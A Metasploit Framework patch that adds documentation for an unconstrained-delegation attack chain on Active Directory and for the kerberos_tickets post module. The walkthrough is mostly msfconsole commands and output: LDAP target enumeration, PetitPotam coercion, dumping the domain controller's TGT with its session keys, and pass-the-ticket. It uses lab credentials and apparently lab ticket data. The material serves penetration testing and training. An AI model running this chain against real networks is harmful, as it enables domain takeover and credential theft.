From 54bce7fcb58039d7c367386f895d24a4b400a00f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 23 Aug 2023 08:43:55 -0400 Subject: [PATCH] Add module docs --- .../ldap_query/ldap_queries_default.yaml | 2 +- .../kerberos/unconstrained_delegation.md | 226 ++++++++++ docs/navigation.rb | 6 +- .../post/windows/manage/kerberos_tickets.md | 405 ++++++++++++++++++ .../post/windows/manage/kerberos_tickets.rb | 3 + 5 files changed, 640 insertions(+), 2 deletions(-) create mode 100644 docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md create mode 100644 documentation/modules/post/windows/manage/kerberos_tickets.md diff --git a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml index 483ec73522..075ead2477 100644 --- a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml +++ b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml @@ -292,7 +292,7 @@ queries: references: - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm - action: ENUM_UNCONSTRAINED_DELEGATION - description: 'Dump info about all known objects that allow uncontrained delegation.' + description: 'Dump info about all known objects that allow unconstrained delegation.' filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)' attributes: - cn diff --git a/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md b/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md new file mode 100644 index 0000000000..4f08ab0540 --- /dev/null +++ b/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md @@ -0,0 +1,226 @@ +# Unconstrained Delegation Exploitation + +If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then +the attacker can leverage it to compromise the Active Directory domain. + +## Lab setup + +For this attack to work there must be a computer account (workstation or server) in the active directory domain that has +been configured for unconstrained delegation. + +On the domain controller: + +1. Open "Active Directory Users and Computers" +2. Navigate to the computer account, right click and select "Properties" +3. In the "Delegation" tab, select "Trust this computer for delegation to any service (Kerberos only)" + +On the target computer: + +1. Force an update of group policy by running `gpupdate /force` +2. Reboot the computer + +## Attack Workflow + +This attack assumes that the attacker has: + +1. The IP address of the domain controller. +2. The active directory domain name. +3. A compromised domain account (no special privileges are necessary). +4. The ability to fully compromise a target system through some means. +5. (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used. + Verify this using `db_status` command. + +At a high-level the summary to leverage this attack chain is: + +1. Identify a target computer account configured with unconstrained delegation. +2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works). +3. Coerce authentication to the compromised target from a domain controller. +4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account. +5. Use the TGT to authenticate to the domain controller as itself (the computer account). + +### Target Identification +The unconstrained delegation setting is stored as a bit flag in the `userAccountControl` LDAP attribute. A domain +account can be used with the `auxiliary/gather/ldap_query` module to identify computer accounts configured for +unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation +and should be ignored as targets. + +Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets: +``` +msf6 > use auxiliary/gather/ldap_query +msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10 +RHOSTS => 192.168.159.10 +msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local +DOMAIN => msflab.local +msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle +USERNAME => aliddle +msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1! +PASSWORD => Password1! +msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION +ACTION => ENUM_UNCONSTRAINED_DELEGATION +msf6 auxiliary(gather/ldap_query) > run +[*] Running module against 192.168.159.10 + +[*] Discovering base DN automatically +[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local +[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local +CN=WS01 CN=Computers DC=msflab DC=local +======================================= + + Name Attributes + ---- ---------- + cn WS01 + objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local + samaccountname WS01$ + +CN=DC OU=Domain Controllers DC=msflab DC=local +============================================== + + Name Attributes + ---- ---------- + cn DC + memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local + objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local + samaccountname DC$ + +[*] Auxiliary module execution completed +msf6 auxiliary(gather/ldap_query) > +``` + +This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the +domain controllers to remove from the list of potential targets. + +``` +msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS +ACTION => ENUM_DOMAIN_CONTROLLERS +msf6 auxiliary(gather/ldap_query) > run +[*] Running module against 192.168.159.10 + +[*] Discovering base DN automatically +[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local +[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local +CN=DC OU=Domain Controllers DC=msflab DC=local +============================================== + + Name Attributes + ---- ---------- + distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local + dnshostname DC.msflab.local + name DC + operatingsystem Windows Server 2019 Standard + operatingsystemversion 10.0 (17763) + +[*] Auxiliary module execution completed +msf6 auxiliary(gather/ldap_query) > +``` + +This show that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target. + +### Exploitation +Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter +session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The +`auxiliary/scanner/dcerpc/petitpotam` module can be used for this purpose. Use the module, and take care to set the +`LISTENER` option to **the hostname of the compromised host**. The hostname must be used and not an IP address. Set the +remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `SMBPass` to the credentials of the +compromised domain account. + +``` +msf6 > use auxiliary/scanner/dcerpc/petitpotam +msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local +LISTENER => ws01.msflab.local +msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle +SMBUser => aliddle +msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1! +SMBPass => Password1! +msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10 +RHOSTS => 192.168.159.10 +msf6 auxiliary(scanner/dcerpc/petitpotam) > run + +[+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful +[*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf6 auxiliary(scanner/dcerpc/petitpotam) > +``` + +If the module does not indicate that the attack was successful, another tool like +[`Coercer`](https://github.com/p0dalirius/Coercer) can be used to try additional methods. + +Now that the domain controller has authenticated to the target it's necessary to dump the kerberos tickets from the +compromised target. Use the `post/windows/manage/kerberos_tickets` module and the `DUMP_TICKETS` action to dump the TGTs +from the compromised host. If the attack was successful there should be at least one TGT from the domain controller's +computer account. + +``` +msf6 > use post/windows/manage/kerberos_tickets +msf6 post(windows/manage/kerberos_tickets) > set SESSION -1 +SESSION => -1 +msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/* +SERVICE => krbtgt/* +msf6 post(windows/manage/kerberos_tickets) > run + +[*] LSA Handle: 0x000001efe1c415a0 +[*] LogonSession LUID: 0x00004bc1d +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw== +[*] LogonSession LUID: 0x00001052b +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 + +... omitted for brevity ... +``` + +In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon session with LUID `0x00004bc1d`. The +ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`. + +``` +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +id host principal sname issued status path +-- ---- --------- ----- ------ ------ ---- +411 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin +407 192.168.159.10 WS01$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin + +msf6 post(windows/manage/kerberos_tickets) > +``` + +### Using The Ticket +Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby +the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to +use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain +controller. diff --git a/docs/navigation.rb b/docs/navigation.rb index 00b5eb1d5f..99ff61e26c 100644 --- a/docs/navigation.rb +++ b/docs/navigation.rb @@ -186,7 +186,11 @@ NAVIGATION_CONFIG = [ }, { path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md', - title: 'RBCD - Resource-based constrained delegation' + title: 'Resource-based constrained delegation (RBCD)' + }, + { + path: 'kerberos/unconstrained_delegation.md', + title: 'Unconstrained delegation' } ] }, diff --git a/documentation/modules/post/windows/manage/kerberos_tickets.md b/documentation/modules/post/windows/manage/kerberos_tickets.md new file mode 100644 index 0000000000..af1d962d0a --- /dev/null +++ b/documentation/modules/post/windows/manage/kerberos_tickets.md @@ -0,0 +1,405 @@ +Manage kerberos tickets on a compromised host. Different actions are available for different tasks. Kerberos tickets are +associated with logon sessions which can be enumerated with the `ENUM_LUIDS` action. s + +## Options + +### LUID +An optional logon session LUID to target in the DUMP_TICKETS and SHOW_LUID actions. The LUID is expressed in hex, e.g. +`0x11223344`. + +### SERVICE +An optional service name wildcard to target in the DUMP_TICKETS action. This option accepts wild cards. For example, to +dump only TGTs use `krbtgt/*` and to only dump tickets for dc.msflab.local, use `*/dc.msflab.local`. Wildcards and +service names are case insensitive. + +## Actions + +### DUMP_TICKETS +This action allows dumping kerberos tickets from a compromised host. These tickets are loaded into Metasploit's +kerberos ticket cache when Metasploit is connected to a database. If the Meterpreter session is running with +administrative privileges, then the tickets from all logon sessions can be dumped. If the Meterpreter session is not +running with Administrative privileges then only the tickets from the current logon session / current user can be +dumped. If the `LUID` option is set then only the tickets from that logon session will be dumped. Targeting a specific +LUID with the `LUID` option requires administrative privileges. + +### ENUM_LUIDS +This action will enumerate the LUIDs of all active logon sessions. Some basic information is printed for each LUID. + +### SHOW_LUID +This action will show the LUID and some basic information about the current logon session unless the `LUID` option is +set in which case that logon session is shown. + +## Scenarios + +In this case the operator lists the currently cached Kerberos tickets in the Metasploit database. After that the +`DUMP_TICKETS` action is used with a service filter to dump the TGTs on the compromised host. Finally, the `klist` +command is used again to show the newly added TGTs. + +``` +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +No tickets + +msf6 post(windows/manage/kerberos_tickets) > run SESSION=-1 SERVICE=krbtgt/* + +[*] LSA Handle: 0x000001efe1bf7270 +[*] LogonSession LUID: 0x00004bc1d +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw== +[*] LogonSession LUID: 0x00001052b +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x00000aa83 +[*] User: \ +[*] Session: 0 +[*] AuthenticationPackage: NTLM +[*] LogonType: UndefinedLogonType (0) +[*] LogonTime: 2023-08-23 08:32:27 -0400 +[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated. +[*] LogonSession LUID: 0x0000ae359 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x0000ae2d3 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x00004fff8 +[*] User: MSFLAB\smcintyre +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] LogonSession LUID: 0x00004b823 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] LogonSession LUID: 0x00000b7c4 +[*] User: Font Driver Host\UMFD-0 +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0001f3e4f +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 09:42:34 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw== +[*] LogonSession LUID: 0x0001243b3 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:47:47 -0400 +[*] LogonSession LUID: 0x0000003e5 +[*] User: NT AUTHORITY\LOCAL SERVICE +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Service (5) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x0000ae390 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x0000ae320 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x00000b7be +[*] User: Font Driver Host\UMFD-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x00000b76e +[*] User: Font Driver Host\UMFD-0 +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0000104e9 +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x00000b77b +[*] User: Font Driver Host\UMFD-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0000003e7 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: UndefinedLogonType (0) +[*] LogonTime: 2023-08-23 08:32:26 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA== +[*] Ticket[1] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, 